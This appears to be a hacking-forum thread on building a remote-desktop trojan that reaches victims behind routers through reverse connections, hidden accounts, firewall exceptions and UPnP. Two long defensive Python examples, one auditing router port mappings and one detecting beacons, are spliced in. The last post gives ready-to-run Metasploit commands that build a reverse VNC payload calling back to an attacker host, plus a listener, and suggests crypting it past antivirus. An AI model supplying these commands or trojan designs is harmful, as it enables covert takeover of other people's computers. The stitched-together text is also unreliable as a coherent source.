Well, it's very difficult to establish a connection from your computer directly to the victim's computer, and that is because the router has something like a firewall that stops any incoming connection. Okay, if you want to go deep you will have to use a 0-day exploit to pass the firewall. Now you have to code a packet sender to send a raw network packet in order to exploit a specific protocol service (TCP/UDP), like an AV update protocol or even an MSN protocol. That part is very hard. I know the theory very well, but I've tried it once and I took an arrow to the knee...
Here is an example of one of those candies:
http://www.zerodayinitiative.com/advisories/ZDI-12-033/
You will have to learn cryptography of protocols and routers, if I'm not wrong, and network programming to send the packet, and reverse engineering for analysis of the protocol. Good luck.
Oh my. He's not talking about exploiting an active RD server (these days there is a lot of activity on this :P). He's talking about infecting a machine and having RD access.
You have two ways:
a) Code your own RD manager. You will have to send screen images, catch events, send events, and shit. bubzuru made this: http://evilzone.org/evilzone-releases/silent-vnc-%28official-thread%29/msg11161/#msg11161
b) Just add an account and enable Windows' RD. Send your IP back. But as gh0st said, you will probably not be able to connect due to the router's firewall. I don't know if MS RD allows working in reverse mode.
How TeamViewer works is a mystery, although for viruses this technique is called "reverse connection": instead of you connecting, the virus connects to you. This works because the router firewall, with its default configuration, usually blocks incoming traffic but not outgoing. Windows Firewall blocks both (usually it asks you what to do), but there are lots of methods to add yourself to the exception list.
A remote desktop trojan is simpler because (the way I see it) it just enables and configures RDP on a Windows machine, then sends the info back to you, or doesn't if it's coded to set static passwords everywhere.
@Professor Potato: You're an idiot.
Bro, why waste countless hours when you can use TeamViewer, bro? Who's the idiot now, bro?
Still you.
I don't know much about RDP. But keep in mind that a virus should have everything in itself. Additional batch or VBScript files are not how viruses roll.
If you are enabling the Windows default RDP then I guess you don't need to put exceptions in the firewall. You don't even need to do anything else, I think. Just enable RDP with the settings you want, then let the virus send the info back to you, like the IP, port, user and password. This might be tricky; maybe email?
How does a remote desktop trojan work? Does it enable port 3389 (default) itself in the victim's router configuration? If not, how does it work? Since if I want to code my own, is it only possible if the victim has enabled router port 3389?
Let me just start off by saying that I really do not know how to start this reply. This topic contains so much retarded text and information written in a manner that should never see the light of day.
The things discussed in this topic are basic networking knowledge. Not the RDC part, but the WAN/LAN/routing part.
To start off, I will answer the original topic question:
(quote above is not original, corrected quite a lot.)
<rant>
When you use commas, use them correctly. It is not "word , word" or "word,word" or "word ,word". It is "word, word".
One does not use capital letters in words that are not names, locations, abbreviations and a few other exceptions.
Use punctuation.
Use question marks.
Use line breaks.
DO NOT USE THE WORD "BRO" OR ALIKE.
This may not be as annoying to you and to people who write like you right now. But once you stop writing like a fool and start writing understandably, it is a real mother-fucking pain in the ass.
</rant>
Now on to your question:
Very, very few applications/services auto-forward their ports in routers, and Microsoft's remote desktop control service is not one of them. This is simply because there are no standards for this (I am sure there are more reasons for it as well). All routers (most) are different from one another, and so forth.
However, there is something called UPnP which allows for temporary port forwarding. Various torrent clients and so forth use UPnP to allow file exchange. I suggest you look into that, or use reverse connection technology.
In reply to this part of your question (", if no then how it works :S"): if you are in a LAN and separated from the Internet by a router or other means of network separation, you have to configure your separation device(s) to forward specific ports and/or addresses to the correct machine inside the LAN, and then connect to the router's public IP (often referred to as port forwarding).
I would suggest you look away from most other replies than mine in this topic as they are just confusing and/or wrong. I would also suggest you do the first part of a CCNA Cisco certification or something along those lines. Not saying that you need to have a deep understanding of everything before moving on, but it's a smart choice if you do.
I would also like to apologize for any offense people will take from this as I know people will. The 'rant' section of this reply is a general reply to all rubbish-writers. I do not mean to offend anyone, but I just can't stand people who can't write properly. Even though I have been there and done that.
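As a defender-side counterpart to the UPnP remark above (an IGD router will add a port mapping on request, and there is no standard for which application may do so), the following Python is an added example, not code from this thread or from any project named in it. It parses the fields of a WANIPConnection GetGenericPortMappingEntry response, which is the real IGD schema, from two constructed responses (the hosts, ports, descriptions and lease values are made up) and flags any enabled mapping that exposes a remote-access service such as RDP on port 3389 to the Internet. Fetching the entries from the router's control URL is not shown; the sample XML stands in for it.

```python
"""Audit UPnP IGD port mappings for exposed remote-access services (added example)."""
import xml.etree.ElementTree as ET

# Internal ports whose exposure through a router mapping a defender wants to know about.
# The set is an assumption for this example, not a standard list.
RISKY_PORTS = {3389: "RDP", 5900: "VNC", 22: "SSH", 445: "SMB"}

# Constructed GetGenericPortMappingEntry responses (WANIPConnection:1 field names are real,
# the values are made up): a permanent RDP mapping and a one-hour torrent mapping.
RDP_ENTRY = """
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:GetGenericPortMappingEntryResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>3389</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>3389</NewInternalPort>
      <NewInternalClient>192.168.1.50</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>rdp</NewPortMappingDescription>
      <NewLeaseDuration>0</NewLeaseDuration>
    </u:GetGenericPortMappingEntryResponse>
  </s:Body>
</s:Envelope>
"""

TORRENT_ENTRY = """
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:GetGenericPortMappingEntryResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>6881</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>6881</NewInternalPort>
      <NewInternalClient>192.168.1.51</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>torrent client</NewPortMappingDescription>
      <NewLeaseDuration>3600</NewLeaseDuration>
    </u:GetGenericPortMappingEntryResponse>
  </s:Body>
</s:Envelope>
"""

SAMPLE_ENTRIES = [RDP_ENTRY, TORRENT_ENTRY]

FIELDS = ("NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort",
          "NewInternalClient", "NewEnabled", "NewPortMappingDescription", "NewLeaseDuration")


def parse_mapping_entry(xml_text):
    """Turn one GetGenericPortMappingEntry response into a plain dict."""
    root = ET.fromstring(xml_text)
    raw = {}
    for name in FIELDS:
        # The New* elements are unqualified, so a plain tag search finds them.
        node = root.find(".//" + name)
        raw[name] = (node.text or "").strip() if node is not None else ""
    return {
        "remote_host": raw["NewRemoteHost"] or "*",      # empty means any source host
        "external_port": int(raw["NewExternalPort"]),
        "protocol": raw["NewProtocol"],
        "internal_port": int(raw["NewInternalPort"]),
        "internal_client": raw["NewInternalClient"],
        "enabled": raw["NewEnabled"] == "1",
        "description": raw["NewPortMappingDescription"],
        "lease_seconds": int(raw["NewLeaseDuration"]),  # 0 means the mapping never expires
    }


def audit_mappings(mappings):
    """Return a finding for every enabled mapping that exposes a risky internal port."""
    findings = []
    for m in mappings:
        if not m["enabled"]:
            continue
        service = RISKY_PORTS.get(m["internal_port"])
        if service is None:
            continue
        findings.append({
            "internal_client": m["internal_client"],
            "service": service,
            "external_port": m["external_port"],
            "protocol": m["protocol"],
            "permanent": m["lease_seconds"] == 0,
            "description": m["description"],
        })
    return findings


if __name__ == "__main__":
    for finding in audit_mappings([parse_mapping_entry(x) for x in SAMPLE_ENTRIES]):
        print("exposed:", finding)
```

On a real network the responses come from walking GetGenericPortMappingEntry with an increasing NewPortMappingIndex until the router returns an error; a mapping with a zero lease that nobody on the LAN recognises is the one to investigate.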
You connect to your localhost where there will be a program listening. This program at the same time listens on a remote port which a second program, running on your victim's computer, is constantly trying to connect to. And once you connect to the local program on your machine, and there is a connection from your machine's program to the victim's program, a message will be sent by your program to the other program, making the other program connect to localhost on your victim's computer. Once all the above has been done, the programs will not do anything other than pass traffic along, piping your remote desktop control client to your victim's remote desktop control server.
Client <-> Local program <- INTERNET -> Victim program <-> Server
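The reverse-connection behaviour described in the earlier post about router firewalls (inbound blocked, outbound allowed) and in the relay description just above is what a defender looks for on the network side: an internal host making regular outbound connections to the same external address and port, whether a direct reverse shell or a relay that keeps retrying its connection. The following Python is an added example, not code from this thread or from any project named in it. It runs a simple beacon detector over a few constructed connection-log lines (the log format, the hosts and the thresholds are assumptions) and flags flows whose connection intervals are both frequent and regular.

```python
"""Flag periodic outbound connections (reverse-connection beacons) in a connection log (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log, one outbound connection per line: "timestamp src_ip dst_ip dst_port".
# 10.0.0.5 reconnects to one host every ~30 s; 10.0.0.7 is ordinary, irregular web browsing.
SAMPLE_LOG = """\
2012-03-01T10:00:00 10.0.0.5 203.0.113.10 2482
2012-03-01T10:00:30 10.0.0.5 203.0.113.10 2482
2012-03-01T10:01:00 10.0.0.5 203.0.113.10 2482
2012-03-01T10:01:31 10.0.0.5 203.0.113.10 2482
2012-03-01T10:02:00 10.0.0.5 203.0.113.10 2482
2012-03-01T10:00:12 10.0.0.7 198.51.100.20 443
2012-03-01T10:00:14 10.0.0.7 198.51.100.21 443
2012-03-01T10:03:40 10.0.0.7 198.51.100.22 443
2012-03-01T10:09:02 10.0.0.7 198.51.100.20 443
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, src, dst, dport) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return records


def find_beacons(records, min_connections=4, max_jitter=0.2):
    """Group connections per (src, dst, dport) flow and flag regular, repeated ones.

    A flow is reported when it has at least `min_connections` connections and the
    relative spread of the gaps between them (population std dev / mean) is at most
    `max_jitter`. Both thresholds are assumptions chosen for this example.
    """
    by_flow = defaultdict(list)
    for ts, src, dst, dport in records:
        by_flow[(src, dst, dport)].append(ts)

    findings = []
    for (src, dst, dport), stamps in by_flow.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        intervals = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(intervals)
        if avg <= 0:
            continue  # all connections in the same second; nothing periodic to measure
        jitter = pstdev(intervals) / avg
        if jitter <= max_jitter:
            findings.append({
                "src": src,
                "dst": dst,
                "dport": dport,
                "count": len(stamps),
                "interval_s": round(avg, 1),
                "jitter": round(jitter, 3),
            })
    return sorted(findings, key=lambda f: (f["src"], f["dst"], f["dport"]))


if __name__ == "__main__":
    for finding in find_beacons(parse_log(SAMPLE_LOG)):
        print("possible beacon:", finding)
```

Real implants add random sleep jitter and rotate destinations, so in practice the jitter threshold is loosened and the grouping is done per destination network or per TLS fingerprint rather than per exact address; the structure of the check stays the same.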
Why don't you try a reverse VNC session with Metasploit:
Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 X > /tmp/reverse-vnc.exe
Listener:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 DisableCourtesyShell=TRUE E
Of course this will be detected by AV if you don't know how to crypt it.